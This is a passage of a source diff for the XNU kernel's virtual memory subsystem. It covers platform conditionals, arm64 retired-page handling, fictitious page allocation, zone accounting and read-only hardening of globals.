upl_ptr, vm_tag_t tag); -#endif /* XNU_KERNEL_PRIVATE */ - -extern struct vnode * upl_lookup_vnode(upl_t upl); - -#ifndef MACH_KERNEL_PRIVATE -typedef struct vm_page *vm_page_t; -#endif - -extern void vm_page_free_list( +extern void vm_page_free_list( vm_page_t mem, boolean_t prepare_object); extern kern_return_t vm_page_alloc_list( int page_count, - int flags, - vm_page_t * list); + kma_flags_t flags, + vm_page_t *list); + +#endif /* XNU_KERNEL_PRIVATE */ + +extern struct vnode * upl_lookup_vnode(upl_t upl); extern void vm_page_set_offset(vm_page_t page, vm_object_offset_t offset); extern vm_object_offset_t vm_page_get_offset(vm_page_t page); @@ -276,9 +276,9 @@ extern vm_page_t vm_page_get_next(vm_page_t page); extern kern_return_t mach_vm_pressure_level_monitor(boolean_t wait_for_pressure, unsigned int *pressure_level); -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX extern kern_return_t vm_pageout_wait(uint64_t deadline); -#endif +#endif /* XNU_TARGET_OS_OSX */ #ifdef MACH_KERNEL_PRIVATE diff --git a/osfmk/vm/vm_phantom_cache.c b/osfmk/vm/vm_phantom_cache.c index 01e0711b3..c0a74a04f 100644 --- a/osfmk/vm/vm_phantom_cache.c +++ b/osfmk/vm/vm_phantom_cache.c @@ -36,21 +36,21 @@ uint32_t phantom_cache_eval_period_in_msecs = 250; uint32_t phantom_cache_thrashing_threshold_ssd = 1000; -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX uint32_t phantom_cache_thrashing_threshold = 500; -#else +#else /* !XNU_TARGET_OS_OSX */ uint32_t phantom_cache_thrashing_threshold = 50; -#endif +#endif /* !XNU_TARGET_OS_OSX */ /* * Number of consecutive thrashing periods required before * vm_phantom_cache_check_pressure() returns true. */ -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX unsigned phantom_cache_contiguous_periods = 4; -#else +#else /* !XNU_TARGET_OS_OSX */ unsigned phantom_cache_contiguous_periods = 2; -#endif +#endif /* !XNU_TARGET_OS_OSX */ clock_sec_t pc_start_of_eval_period_sec = 0; clock_nsec_t pc_start_of_eval_period_nsec = 0; @@ -113,11 +113,11 @@ vm_phantom_cache_init() if (!VM_CONFIG_COMPRESSOR_IS_ACTIVE) { return; } -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX num_entries = (uint32_t)(((max_mem / PAGE_SIZE) / 10) / VM_GHOST_PAGES_PER_ENTRY); -#else +#else /* !XNU_TARGET_OS_OSX */ num_entries = (uint32_t)(((max_mem / PAGE_SIZE) / 4) / VM_GHOST_PAGES_PER_ENTRY); -#endif +#endif /* !XNU_TARGET_OS_OSX */ vm_phantom_cache_num_entries = 1; while (vm_phantom_cache_num_entries < num_entries) { diff --git a/osfmk/vm/vm_protos.h b/osfmk/vm/vm_protos.h index 50a654348..78b5a746d 100644 --- a/osfmk/vm/vm_protos.h +++ b/osfmk/vm/vm_protos.h @@ -71,8 +71,13 @@ extern boolean_t vm_swap_files_pinned(void); extern mach_port_name_t ipc_port_copyout_send( ipc_port_t sright, ipc_space_t space); +extern mach_port_name_t ipc_port_copyout_send_pinned( + ipc_port_t sright, + ipc_space_t space); extern task_t port_name_to_task( mach_port_name_t name); +extern task_t port_name_to_task_read( + mach_port_name_t name); extern task_t port_name_to_task_name( mach_port_name_t name); extern void ipc_port_release_send( @@ -96,6 +101,7 @@ extern void consider_machine_adjust(void); extern vm_map_offset_t get_map_min(vm_map_t); extern vm_map_offset_t get_map_max(vm_map_t); extern vm_map_size_t get_vmmap_size(vm_map_t); +extern int get_task_page_size(task_t); #if CONFIG_COREDUMP extern int get_vmmap_entries(vm_map_t); #endif @@ -178,7 +184,8 @@ extern memory_object_t apple_protect_pager_setup( vm_object_offset_t crypto_backing_offset, struct pager_crypt_info *crypt_info, vm_object_offset_t crypto_start, - vm_object_offset_t crypto_end); + vm_object_offset_t crypto_end, + boolean_t cache_pager); #endif /* CONFIG_CODE_DECRYPTION */ struct vm_shared_region_slide_info; @@ -590,6 +597,20 @@ extern unsigned int mach_vm_ctl_page_free_wanted(void); extern int no_paging_space_action(void); +/* + * counts updated by revalidate_text_page() + */ +extern unsigned int vmtc_total; /* total # of text page corruptions detected */ +extern unsigned int vmtc_undiagnosed; /* of that what wasn't diagnosed */ +extern unsigned int vmtc_not_eligible; /* failed to correct, due to page attributes */ +extern unsigned int vmtc_copyin_fail; /* of undiagnosed, copyin failure count */ +extern unsigned int vmtc_not_found; /* of diagnosed, no error found - code signing error? */ +extern unsigned int vmtc_one_bit_flip; /* of diagnosed, single bit errors */ +#define MAX_TRACK_POWER2 9 /* of diagnosed, counts of 1, 2, 4,... bytes corrupted */ +extern unsigned int vmtc_byte_counts[MAX_TRACK_POWER2 + 1]; + +extern kern_return_t revalidate_text_page(task_t, vm_map_offset_t); + #define VM_TOGGLE_CLEAR 0 #define VM_TOGGLE_SET 1 #define VM_TOGGLE_GETVALUE 999 diff --git a/osfmk/vm/vm_purgeable.c b/osfmk/vm/vm_purgeable.c index b44ec0cf8..08355b9e5 100644 --- a/osfmk/vm/vm_purgeable.c +++ b/osfmk/vm/vm_purgeable.c @@ -736,13 +736,13 @@ vm_purgeable_object_find_and_lock( */ owner = object->vo_owner; if (owner != NULL && owner != VM_OBJECT_OWNER_DISOWNED) { -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #if CONFIG_JETSAM object_task_importance = proc_get_memstat_priority((struct proc *)get_bsdtask_info(owner), TRUE); #endif /* CONFIG_JETSAM */ -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ object_task_importance = task_importance_estimate(owner); -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ } if (object_task_importance < best_object_task_importance) { diff --git a/osfmk/vm/vm_resident.c b/osfmk/vm/vm_resident.c index ca78ec877..0cb0914af 100644 --- a/osfmk/vm/vm_resident.c +++ b/osfmk/vm/vm_resident.c @@ -70,7 +70,7 @@ #include #include #include -#include +#include #include #include #include @@ -169,11 +169,13 @@ boolean_t hibernation_vmqueues_inspection = FALSE; /* Tracks if the hibern * Updated and checked behind the vm_page_queues_lock. */ static void vm_page_free_prepare(vm_page_t page); -static vm_page_t vm_page_grab_fictitious_common(ppnum_t phys_addr); +static vm_page_t vm_page_grab_fictitious_common(ppnum_t, boolean_t); static void vm_tag_init(void); /* for debugging purposes */ +SECURITY_READ_ONLY_EARLY(uint32_t) vm_packed_from_vm_pages_array_mask = + VM_PAGE_PACKED_FROM_ARRAY; SECURITY_READ_ONLY_EARLY(vm_packing_params_t) vm_page_packing_params = VM_PACKING_PARAMS(VM_PAGE_PACKED_PTR); @@ -211,12 +213,12 @@ typedef struct { #define BUCKETS_PER_LOCK 16 -vm_page_bucket_t *vm_page_buckets; /* Array of buckets */ -unsigned int vm_page_bucket_count = 0; /* How big is array? */ -unsigned int vm_page_hash_mask; /* Mask for hash function */ -unsigned int vm_page_hash_shift; /* Shift for hash function */ -uint32_t vm_page_bucket_hash; /* Basic bucket hash */ -unsigned int vm_page_bucket_lock_count = 0; /* How big is array of locks? */ +SECURITY_READ_ONLY_LATE(vm_page_bucket_t *) vm_page_buckets; /* Array of buckets */ +SECURITY_READ_ONLY_LATE(unsigned int) vm_page_bucket_count = 0; /* How big is array? */ +SECURITY_READ_ONLY_LATE(unsigned int) vm_page_hash_mask; /* Mask for hash function */ +SECURITY_READ_ONLY_LATE(unsigned int) vm_page_hash_shift; /* Shift for hash function */ +SECURITY_READ_ONLY_LATE(uint32_t) vm_page_bucket_hash; /* Basic bucket hash */ +SECURITY_READ_ONLY_LATE(unsigned int) vm_page_bucket_lock_count = 0; /* How big is array of locks? */ #ifndef VM_TAG_ACTIVE_UPDATE #error VM_TAG_ACTIVE_UPDATE @@ -225,13 +227,14 @@ unsigned int vm_page_bucket_lock_count = 0; /* How big is array of l #error VM_MAX_TAG_ZONES #endif -boolean_t vm_tag_active_update = VM_TAG_ACTIVE_UPDATE; -lck_spin_t *vm_page_bucket_locks; +/* for debugging */ +SECURITY_READ_ONLY_LATE(bool) vm_tag_active_update = VM_TAG_ACTIVE_UPDATE; +SECURITY_READ_ONLY_LATE(lck_spin_t *) vm_page_bucket_locks; vm_allocation_site_t vm_allocation_sites_static[VM_KERN_MEMORY_FIRST_DYNAMIC + 1]; vm_allocation_site_t * vm_allocation_sites[VM_MAX_TAG_VALUE]; #if VM_MAX_TAG_ZONES -vm_allocation_zone_total_t ** vm_allocation_zone_totals; +static vm_allocation_zone_total_t **vm_allocation_zone_totals; #endif /* VM_MAX_TAG_ZONES */ vm_tag_t vm_allocation_tag_highest; @@ -244,8 +247,6 @@ vm_map_offset_t vm_page_fake_buckets_start, vm_page_fake_buckets_end; #endif /* VM_PAGE_FAKE_BUCKETS */ #endif /* VM_PAGE_BUCKETS_CHECK */ - - #if MACH_PAGE_HASH_STATS /* This routine is only for debug. It is intended to be called by * hand by a developer using a kernel debugger. This routine prints @@ -353,7 +354,6 @@ LCK_GRP_DECLARE(vm_page_lck_grp_local, "vm_page_queue_local"); LCK_GRP_DECLARE(vm_page_lck_grp_purge, "vm_page_purge"); LCK_GRP_DECLARE(vm_page_lck_grp_alloc, "vm_page_alloc"); LCK_GRP_DECLARE(vm_page_lck_grp_bucket, "vm_page_bucket"); -LCK_MTX_EARLY_DECLARE_ATTR(vm_page_alloc_lock, &vm_page_lck_grp_alloc, &vm_page_lck_attr); LCK_SPIN_DECLARE_ATTR(vm_objects_wired_lock, &vm_page_lck_grp_bucket, &vm_page_lck_attr); LCK_SPIN_DECLARE_ATTR(vm_allocation_sites_lock, &vm_page_lck_grp_bucket, &vm_page_lck_attr); @@ -1331,6 +1331,24 @@ pmap_steal_freeable_memory( return pmap_steal_memory_internal(size, TRUE); } +#if defined(__arm64__) +/* + * Retire a page at startup. + * These pages will eventually wind up on the retired_pages_object + * in vm_retire_boot_pages(). + */ +static vm_page_queue_head_t vm_page_queue_retired VM_PAGE_PACKED_ALIGNED; +static void +vm_page_retire_startup(vm_page_t p) +{ + p->vmp_q_state = VM_PAGE_NOT_ON_Q; + p->vmp_error = true; + p->vmp_unusual = true; + vm_page_queue_enter(&vm_page_queue_retired, p, vmp_pageq); + printf("To be retired at boot: page at 0x%llx\n", (long long)ptoa(VM_PAGE_GET_PHYS_PAGE(p))); +} +#endif /* defined(__arm64__) */ + #if CONFIG_SECLUDED_MEMORY /* boot-args to control secluded memory */ unsigned int secluded_mem_mb = 0; /* # of MBs of RAM to seclude */ @@ -1382,8 +1400,15 @@ pmap_startup( * the memory needed to map what's being allocated, i.e. the page * table entries. So the actual number of pages we get will be * less than this. To do someday: include that in the computation. + * + * Also for ARM, we don't use the count of free_pages, but rather the + * range from last page to first page (ignore holes due to retired pages). */ +#if defined(__arm__) || defined(__arm64__) + mem_sz = pmap_free_pages_span() * (uint64_t)PAGE_SIZE; +#else /* defined(__arm__) || defined(__arm64__) */ mem_sz = pmap_free_pages() * (uint64_t)PAGE_SIZE; +#endif /* defined(__arm__) || defined(__arm64__) */ mem_sz += round_page(virtual_space_start) - virtual_space_start; /* Account for any slop */ npages = (uint_t)(mem_sz / (PAGE_SIZE + sizeof(*vm_pages))); /* scaled to include the vm_page_ts */ @@ -1509,6 +1534,9 @@ pmap_startup( #endif vm_delayed_count = 0; +#if defined(__arm64__) + vm_page_queue_init(&vm_page_queue_retired); +#endif /* defined(__arm64__) */ absolutetime_to_nanoseconds(mach_absolute_time(), &start_ns); vm_pages_count = 0; @@ -1533,9 +1561,24 @@ pmap_startup( vm_first_phys_ppnum = phys_page; patch_low_glo_vm_page_info((void *)vm_page_array_beginning_addr, (void *)vm_page_array_ending_addr, vm_first_phys_ppnum); +#if defined(__arm64__) + } else { + /* + * pmap_next_page() may skip over pages reported bad by iboot. + */ + while (i < phys_page - vm_first_phys_ppnum && i < npages) { + ++vm_pages_count; + vm_page_init(&vm_pages[i], i + vm_first_phys_ppnum, FALSE); + vm_page_retire_startup(&vm_pages[i]); + ++i; + } + if (i >= npages) { + break; + } + assert(i == phys_page - vm_first_phys_ppnum); +#endif /* defined(__arm64__) */ } - assert((i + vm_first_phys_ppnum) == phys_page); -#endif +#endif /* defined(__arm__) || defined(__arm64__) */ #if defined(__x86_64__) /* The x86 clump freeing code requires increasing ppn's to work correctly */ @@ -1556,7 +1599,9 @@ pmap_startup( if (!vm_himemory_mode) { do { - vm_page_release_startup(&vm_pages[--i]); + if (!vm_pages[--i].vmp_error) { /* skip retired pages */ + vm_page_release_startup(&vm_pages[i]); + } } while (i != 0); } @@ -1603,13 +1648,15 @@ vm_page_module_init_delayed(void) * Reflect size and usage information for vm_pages[]. */ - z->countavail = (uint32_t)(vm_page_array_ending_addr - vm_pages); - z->countfree = z->countavail - vm_pages_count; + z->z_elems_avail = (uint32_t)(vm_page_array_ending_addr - vm_pages); + z->z_elems_free = z->z_elems_avail - vm_pages_count; zpercpu_get_cpu(z->z_stats, 0)->zs_mem_allocated = vm_pages_count * sizeof(struct vm_page); vm_page_array_zone_data_size = (uintptr_t)((void *)vm_page_array_ending_addr - (void *)vm_pages); vm_page_zone_pages = atop(round_page((vm_offset_t)vm_page_array_zone_data_size)); - z->page_count += vm_page_zone_pages; + z->z_wired_cur += vm_page_zone_pages; + z->z_wired_hwm = z->z_wired_cur; + z->z_va_cur = z->z_wired_cur; /* since zone accounts for these, take them out of stolen */ VM_PAGE_MOVE_STOLEN(vm_page_zone_pages); }); @@ -1636,12 +1683,23 @@ vm_page_module_init(void) ~(VM_PAGE_PACKED_PTR_ALIGNMENT - 1); vm_page_zone = zone_create_ext("vm pages", vm_page_with_ppnum_size, - ZC_ALLOW_FOREIGN | ZC_NOGZALLOC | ZC_ALIGNMENT_REQUIRED | - ZC_NOCALLOUT, ZONE_ID_ANY, ^(zone_t z) { + ZC_NOGZALLOC | ZC_ALIGNMENT_REQUIRED, ZONE_ID_ANY, ^(zone_t z) { #if defined(__LP64__) - zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP); + zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED); #endif - zone_set_exhaustible(z, 0); + /* + * The number "10" is a small number that is larger than the number + * of fictitious pages that any single caller will attempt to allocate + * without blocking. + * + * The largest such number at the moment is kernel_memory_allocate() + * when 2 guard pages are asked. 10 is simply a somewhat larger number, + * taking into account the 50% hysteresis the zone allocator uses. + * + * Note: this works at all because the zone allocator + * doesn't ever allocate fictitious pages. + */ + z->z_elems_rsv = 10; }); } STARTUP(ZALLOC, STARTUP_RANK_SECOND, vm_page_module_init); @@ -1666,11 +1724,7 @@ vm_page_create( for (phys_page = start; phys_page < end; phys_page++) { - while ((m = (vm_page_t) vm_page_grab_fictitious_common(phys_page)) - == VM_PAGE_NULL) { - vm_page_more_fictitious(); - } - + m = vm_page_grab_fictitious_common(phys_page, TRUE); m->vmp_fictitious = FALSE; pmap_clear_noencrypt(phys_page); @@ -1681,6 +1735,38 @@ vm_page_create( } } +#if defined(__arm64__) +/* + * Like vm_page_create(), except we want to immediately retire the page, + * not put it on the free list. + */ +void +vm_page_create_retired( + ppnum_t phys_page) +{ + vm_page_t m; + + m = vm_page_grab_fictitious_common(phys_page, TRUE); + m->vmp_fictitious = FALSE; + pmap_clear_noencrypt(phys_page); + m->vmp_error = true; + m->vmp_unusual = true; + vm_page_lock_queues(); + m->vmp_q_state = VM_PAGE_IS_WIRED; + m->vmp_wire_count++; + vm_page_unlock_queues(); + + lck_mtx_lock(&vm_page_queue_free_lock); + vm_page_pages++; + lck_mtx_unlock(&vm_page_queue_free_lock); + + vm_object_lock(retired_pages_object); + vm_page_insert_wired(m, retired_pages_object, ptoa(VM_PAGE_GET_PHYS_PAGE(m)), VM_KERN_MEMORY_RETIRED); + vm_object_unlock(retired_pages_object); + pmap_retire_page(VM_PAGE_GET_PHYS_PAGE(m)); +} +#endif /* defined(__arm64__) */ + /* * vm_page_hash: * @@ -2621,43 +2707,34 @@ vm_page_init( * Remove a fictitious page from the free list. * Returns VM_PAGE_NULL if there are no free pages. */ -int c_vm_page_grab_fictitious = 0; -int c_vm_page_grab_fictitious_failed = 0; -int c_vm_page_release_fictitious = 0; -int c_vm_page_more_fictitious = 0; -vm_page_t -vm_page_grab_fictitious_common( - ppnum_t phys_addr) +static vm_page_t +vm_page_grab_fictitious_common(ppnum_t phys_addr, boolean_t canwait) { - vm_page_t m; + vm_page_t m; - if ((m = (vm_page_t)zalloc_noblock(vm_page_zone))) { + m = zalloc_flags(vm_page_zone, canwait ? Z_WAITOK : Z_NOWAIT); + if (m) { vm_page_init(m, phys_addr, FALSE); m->vmp_fictitious = TRUE; - - c_vm_page_grab_fictitious++; - } else { - c_vm_page_grab_fictitious_failed++; } - return m; } vm_page_t -vm_page_grab_fictitious(void) +vm_page_grab_fictitious(boolean_t canwait) { - return vm_page_grab_fictitious_common(vm_page_fictitious_addr); + return vm_page_grab_fictitious_common(vm_page_fictitious_addr, canwait); } int vm_guard_count; vm_page_t -vm_page_grab_guard(void) +vm_page_grab_guard(boolean_t canwait) { vm_page_t page; - page = vm_page_grab_fictitious_common(vm_page_guard_addr); + page = vm_page_grab_fictitious_common(vm_page_guard_addr, canwait); if (page) { OSAddAtomic(1, &vm_guard_count); } @@ -2684,91 +2761,9 @@ vm_page_release_fictitious( OSAddAtomic(-1, &vm_guard_count); } - c_vm_page_release_fictitious++; - zfree(vm_page_zone, m); } -/* - * vm_page_more_fictitious: - * - * Add more fictitious pages to the zone. - * Allowed to block. This routine is way intimate - * with the zones code, for several reasons: - * 1. we need to carve some page structures out of physical - * memory before zones work, so they _cannot_ come from - * the zone restricted submap. - * 2. the zone needs to be collectable in order to prevent - * growth without bound. These structures are used by - * the device pager (by the hundreds and thousands), as - * private pages for pageout, and as blocking pages for - * pagein. Temporary bursts in demand should not result in - * permanent allocation of a resource. - * 3. To smooth allocation humps, we allocate single pages - * with kernel_memory_allocate(), and cram them into the - * zone. - */ - -void -vm_page_more_fictitious(void) -{ - vm_offset_t addr; - kern_return_t retval; - - c_vm_page_more_fictitious++; - - /* - * Allocate a single page from the zone restricted submap. Do not wait - * if no physical pages are immediately available, and do not zero the - * space. We need our own blocking lock here to prevent having multiple, - * simultaneous requests from piling up on the zone restricted submap - * lock. - * Exactly one (of our) threads should be potentially waiting on the map - * lock. If winner is not vm-privileged, then the page allocation will - * fail, and it will temporarily block here in the vm_page_wait(). - */ - lck_mtx_lock(&vm_page_alloc_lock); - /* - * If another thread allocated space, just bail out now. - */ - if (os_atomic_load(&vm_page_zone->countfree, relaxed) > 5) { - /* - * The number "5" is a small number that is larger than the - * number of fictitious pages that any single caller will - * attempt to allocate. Otherwise, a thread will attempt to - * acquire a fictitious page (vm_page_grab_fictitious), fail, - * release all of the resources and locks already acquired, - * and then call this routine. This routine finds the pages - * that the caller released, so fails to allocate new space. - * The process repeats infinitely. The largest known number - * of fictitious pages required in this manner is 2. 5 is - * simply a somewhat larger number. - */ - lck_mtx_unlock(&vm_page_alloc_lock); - return; - } - - retval = kernel_memory_allocate(zone_submap(vm_page_zone), - &addr, PAGE_SIZE, 0, KMA_ZERO | KMA_KOBJECT | KMA_NOPAGEWAIT, - VM_KERN_MEMORY_ZONE); - - if (retval != KERN_SUCCESS) { - /* - * No page was available. Drop the - * lock to give another thread a chance at it, and - * wait for the pageout daemon to make progress. - */ - lck_mtx_unlock(&vm_page_alloc_lock); - vm_page_wait(THREAD_UNINT); - return; - } - - zcram(vm_page_zone, addr, PAGE_SIZE); - - lck_mtx_unlock(&vm_page_alloc_lock); -} - - /* * vm_pool_low(): * @@ -2776,7 +2771,7 @@ vm_page_more_fictitious(void) * can get memory without blocking. Advisory only, since the * situation may change under us. */ -int +bool vm_pool_low(void) { /* No locking, at worst we will fib. */ @@ -3053,15 +3048,12 @@ vm_page_grablo(void) VM_PAGE_ZERO_PAGEQ_ENTRY(mem); - disable_preemption(); - *PERCPU_GET(vm_page_grab_count) += 1; + counter_inc(&vm_page_grab_count); VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, 0, 1, 0, 0); - enable_preemption(); return mem; } - /* * vm_page_grab: * @@ -3121,7 +3113,7 @@ return_page_from_cpu_list: vm_page_grab_diags(); vm_offset_t pcpu_base = current_percpu_base(); - *PERCPU_GET_WITH_BASE(pcpu_base, vm_page_grab_count) += 1; + counter_inc_preemption_disabled(&vm_page_grab_count); *PERCPU_GET_WITH_BASE(pcpu_base, free_pages) = mem->vmp_snext; VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, grab_options, 0, 0, 0); @@ -3201,11 +3193,9 @@ return_page_from_cpu_list: if (mem) { VM_CHECK_MEMORYSTATUS; - disable_preemption(); vm_page_grab_diags(); - *PERCPU_GET(vm_page_grab_count) += 1; + counter_inc(&vm_page_grab_count); VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, grab_options, 0, 0, 0); - enable_preemption(); return mem; } @@ -3333,7 +3323,7 @@ return_page_from_cpu_list: * satisfy this request */ vm_page_grab_diags(); - *PERCPU_GET_WITH_BASE(pcpu_base, vm_page_grab_count) += 1; + counter_inc_preemption_disabled(&vm_page_grab_count); VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, grab_options, 0, 0, 0); mem = head; assert(mem->vmp_q_state == VM_PAGE_ON_FREE_LOCAL_Q); @@ -3891,8 +3881,6 @@ vm_page_wait( * context switch. Could be a perf. issue. */ - counter(c_vm_page_wait_block++); - if (need_wakeup) { thread_wakeup((event_t)&vm_page_free_wanted); } @@ -3921,7 +3909,6 @@ vm_page_wait( wait_result = assert_wait(wait_event, interruptible); lck_mtx_unlock(&vm_page_queue_free_lock); - counter(c_vm_page_wait_block++); if (need_wakeup) { thread_wakeup((event_t)&vm_page_free_wanted); @@ -3980,35 +3967,6 @@ vm_page_alloc( return mem; } -/* - * vm_page_alloc_guard: - * - * Allocate a fictitious page which will be used - * as a guard page. The page will be inserted into - * the object and returned to the caller. - */ - -vm_page_t -vm_page_alloc_guard( - vm_object_t object, - vm_object_offset_t offset) -{ - vm_page_t mem; - - vm_object_lock_assert_exclusive(object); - mem = vm_page_grab_guard(); - if (mem == VM_PAGE_NULL) { - return VM_PAGE_NULL; - } - - vm_page_insert(mem, object, offset); - - return mem; -} - - -counter(unsigned int c_laundry_pages_freed = 0; ) - /* * vm_page_free_prepare: * @@ -4051,7 +4009,6 @@ vm_page_free_prepare_queues( * from its pageout queue and adjust the laundry accounting */ vm_pageout_steal_laundry(mem, TRUE); - counter(++c_laundry_pages_freed); } vm_page_queues_remove(mem, TRUE); @@ -5806,7 +5763,8 @@ vm_page_find_contiguous( unsigned int idx_last_contig_page_found = 0; int free_considered = 0, free_available = 0; int substitute_needed = 0; - boolean_t wrapped, zone_gc_called = FALSE; + int zone_gc_called = 0; + boolean_t wrapped; kern_return_t kr; #if DEBUG clock_sec_t tv_start_sec = 0, tv_end_sec = 0; @@ -6445,7 +6403,7 @@ done_scanning: #if MACH_ASSERT vm_page_verify_free_lists(); #endif - if (m == NULL && zone_gc_called == FALSE) { + if (m == NULL && zone_gc_called < 2) { printf("%s(num=%d,low=%d): found %d pages at 0x%llx...scanned %d pages... yielded %d times... dumped run %d times... stole %d pages... stole %d compressed pages... wired count is %d\n", __func__, contig_pages, max_pnum, npages, (vm_object_offset_t)start_pnum << PAGE_SHIFT, scanned, yielded, dumped_run, stolen_pages, compressed_pages, vm_page_wire_count); @@ -6454,9 +6412,9 @@ done_scanning: (void)(*consider_buffer_cache_collect)(1); } - consider_zone_gc(FALSE); + zone_gc(zone_gc_called ? ZONE_GC_DRAIN : ZONE_GC_TRIM); - zone_gc_called = TRUE; + zone_gc_called++; printf("vm_page_find_contiguous: zone_gc called... wired count is %d\n", vm_page_wire_count); goto full_scan_again; @@ -6704,36 +6662,76 @@ vm_page_do_delayed_work( kern_return_t vm_page_alloc_list( - int page_count, - int flags, - vm_page_t *list) + int page_count, + kma_flags_t flags, + vm_page_t *list) { - vm_page_t lo_page_list = VM_PAGE_NULL; + vm_page_t page_list = VM_PAGE_NULL; vm_page_t mem; - int i; + kern_return_t kr = KERN_SUCCESS; + int page_grab_count = 0; + mach_vm_size_t map_size = ptoa_64(page_count); +#if DEVELOPMENT || DEBUG + task_t task = current_task(); +#endif /* DEVELOPMENT || DEBUG */ - if (!(flags & KMA_LOMEM)) { - panic("vm_page_alloc_list: called w/o KMA_LOMEM"); - } + for (int i = 0; i < page_count; i++) { + for (;;) { + if (flags & KMA_LOMEM) { + mem = vm_page_grablo(); + } else { + mem = vm_page_grab(); + } - for (i = 0; i < page_count; i++) { - mem = vm_page_grablo(); + if (mem != VM_PAGE_NULL) { + break; + } - if (mem == VM_PAGE_NULL) { - if (lo_page_list) { - vm_page_free_list(lo_page_list, FALSE); + if (flags & KMA_NOPAGEWAIT) { + kr = KERN_RESOURCE_SHORTAGE; + goto out; + } + if ((flags & KMA_LOMEM) && (vm_lopage_needed == TRUE)) { + kr = KERN_RESOURCE_SHORTAGE; + goto out; } - *list = VM_PAGE_NULL; + /* VM privileged threads should have waited in vm_page_grab() and not get here. */ + assert(!(current_thread()->options & TH_OPT_VMPRIV)); - return KERN_RESOURCE_SHORTAGE; + uint64_t unavailable = (vm_page_wire_count + vm_page_free_target) * PAGE_SIZE; + if (unavailable > max_mem || map_size > (max_mem - unavailable)) { + kr = KERN_RESOURCE_SHORTAGE; + goto out; + } + VM_PAGE_WAIT(); } - mem->vmp_snext = lo_page_list; - lo_page_list = mem; + + page_grab_count++; + mem->vmp_snext = page_list; + page_list = mem; } - *list = lo_page_list; - return KERN_SUCCESS; + if (KMA_ZERO & flags) { + for (mem = page_list; mem; mem = mem->vmp_snext) { + vm_page_zero_fill(mem); + } + } + +out: +#if DEBUG || DEVELOPMENT + if (task != NULL) { + ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count); + } +#endif + + if (kr == KERN_SUCCESS) { + *list = page_list; + } else { + vm_page_free_list(page_list, FALSE); + } + + return kr; } void @@ -7200,7 +7198,7 @@ hibernate_flush_memory() orig_wire_count = vm_page_wire_count; (void)(*consider_buffer_cache_collect)(1); - consider_zone_gc(FALSE); + zone_gc(ZONE_GC_DRAIN); HIBLOG("hibernate_flush_memory: buffer_cache_gc freed up %d wired pages\n", orig_wire_count - vm_page_wire_count); @@ -9150,36 +9148,45 @@ vm_allocation_zones_init(void) vm_allocation_zone_totals[VM_KERN_MEMORY_KALLOC] = (vm_allocation_zone_total_t *) addr; } -void -vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx) +__attribute__((noinline)) +static vm_tag_t +vm_tag_zone_stats_alloc(vm_tag_t tag, zalloc_flags_t flags) { - vm_allocation_zone_total_t * zone; + vm_allocation_zone_total_t *stats; + vm_size_t size = sizeof(*stats) * VM_MAX_TAG_ZONES; + stats = kheap_alloc(KHEAP_DATA_BUFFERS, size, + Z_VM_TAG(VM_KERN_MEMORY_DIAG) | Z_ZERO | flags); + if (!stats) { + return VM_KERN_MEMORY_NONE; + } + if (!os_atomic_cmpxchg(&vm_allocation_zone_totals[tag], NULL, stats, release)) { + kheap_free(KHEAP_DATA_BUFFERS, stats, size); + } + return tag; +} + +vm_tag_t +vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx, uint32_t zflags) +{ assert(VM_KERN_MEMORY_NONE != tag); assert(tag < VM_MAX_TAG_VALUE); if (zidx >= VM_MAX_TAG_ZONES) { - return; + return VM_KERN_MEMORY_NONE; } - zone = vm_allocation_zone_totals[tag]; - if (!zone) { - zone = kalloc_tag(VM_MAX_TAG_ZONES * sizeof(*zone), VM_KERN_MEMORY_DIAG); - if (!zone) { - return; - } - bzero(zone, VM_MAX_TAG_ZONES * sizeof(*zone)); - if (!OSCompareAndSwapPtr(NULL, zone, &vm_allocation_zone_totals[tag])) { - kfree(zone, VM_MAX_TAG_ZONES * sizeof(*zone)); - } + if (__probable(vm_allocation_zone_totals[tag])) { + return tag; } + return vm_tag_zone_stats_alloc(tag, zflags); } void -vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, int64_t delta, int64_t dwaste) +vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, long delta) { - vm_allocation_zone_total_t * zone; - uint32_t new; + vm_allocation_zone_total_t *stats; + vm_size_t value; assert(VM_KERN_MEMORY_NONE != tag); assert(tag < VM_MAX_TAG_VALUE); @@ -9188,30 +9195,16 @@ vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, int64_t delta, int64_t dwas return; } - zone = vm_allocation_zone_totals[tag]; - assert(zone); - zone += zidx; + stats = vm_allocation_zone_totals[tag]; + assert(stats); + stats += zidx; - /* the zone is locked */ + value = os_atomic_add(&stats->vazt_total, delta, relaxed); if (delta < 0) { - assertf(zone->total >= ((uint64_t)-delta), "zidx %d, tag %d, %p", zidx, tag, zone); - zone->total += delta; - } else { - zone->total += delta; - if (zone->total > zone->peak) { - zone->peak = zone->total; - } - if (dwaste) { - new = zone->waste; - if (zone->wastediv < 65536) { - zone->wastediv++; - } else { - new -= (new >> 16); - } - __assert_only bool ov = os_add_overflow(new, dwaste, &new); - assert(!ov); - zone->waste = new; - } + assertf((long)value >= 0, "zidx %d, tag %d, %p", zidx, tag, stats); + return; + } else if (os_atomic_load(&stats->vazt_peak, relaxed) < value) { + os_atomic_max(&stats->vazt_peak, value, relaxed); } } @@ -9416,19 +9409,16 @@ process_account(mach_memory_info_t * info, unsigned int num_info, && (zone = vm_allocation_zone_totals[idx]) && (nextinfo < num_info)) { for (zidx = 0; zidx < 